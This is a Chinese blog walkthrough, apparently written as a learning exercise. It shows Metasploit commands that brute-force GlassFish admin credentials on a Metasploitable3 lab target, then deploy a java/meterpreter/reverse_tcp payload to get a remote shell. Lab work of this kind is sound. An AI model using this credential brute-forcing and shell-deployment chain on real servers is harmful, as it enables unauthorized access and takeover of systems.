【metasploit3靶场验证】GlassFish相关漏洞利用复现

本文详细描述了如何在Metasploitable3环境中利用GlassFish的漏洞进行弱密码爆破,包括使用metasploit的glassfish_login模块和multi/http/glassfish_deployer模块进行验证过程,以及遇到的问题和解决方法。
摘要由CSDN通过智能技术生成

背景

背景资料

metasploitable3中GlassFish相关漏洞

metasploit框架glassfish_deployer模块利用文档

验证过程

环境准备

  1. 保证KALI和metasploitable3靶机在同一网段下(同NAT或同桥接)。
  2. metasploitable3的端口开启(初始镜像默认开启所有端口,关闭防火墙)
  3. NMAP扫描到靶机的对应端口及服务

GlassFish默认端口4848

Glassfish弱密码爆破

# 进入msf命令行
msfconsole
# 搜索glassfish相关模块
search glassfish
# 使用编号为1的模块,也可直接 use auxiliary/scanner/http/glassfish_login
use 1

按以上命令输入后会如下图所示,进入到该模块的配置阶段
搜索并使用glassfish_login模块

# 先用show options查看该模块的配置项
show options
# 再进行对应参数的配置,Required为yes的为必要参数
set rhost 靶机地址
# 此处使用用户名和密码字典进行模拟,也可直接指定用户名和密码
set user_file user_dict_path
set pass_file pass_dict_path
# 启动该模块进行利用,也可使用exploit命令
run

按以上命令输入后会如下图所示,可以看到字典爆破出可用的用户名和密码:admin/sploit
glassfish登录爆破
接着访问http://target_url:4848,使用admin/sploit登录成功
登陆成功

multi/http/glassfish_deployer模块验证

如果按照msf框架的文档来操作,我这边是会报错的
在这里插入图片描述

# 按官方文档建议使用deployer模块
use multi/http/glassfish_deployer
set rhost target_ip
set username admin
set password sploit
run

会出现报错Exploit aborted due to failure: no-access: http://target-ip - GlassFish - Failed to authenticate
在这里插入图片描述
我理解为没有将SSL参数设为true,导致无法认证,所以设置后重新尝试,但出现了新的报错Exploit aborted due to failure: no-target: Unable to automatically select a target

在这里插入图片描述
输入info命令查看模块信息,原来是默认目标系统为automatically,此处报错提示为自动选择不可用,那么尝试手动选择目标系统
在这里插入图片描述
正确答案是应该选择Java通用,但同时会报payload不可用的错误Exploit failed: linux/x86/meterpreter/reverse_top is not a compatible payload.

在这里插入图片描述
此时我们需要替换payload为java/meterpreter/reverse_tcp,此处参考该README,重新run一下,即可获取目标shell
在这里插入图片描述
完结撒花~

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值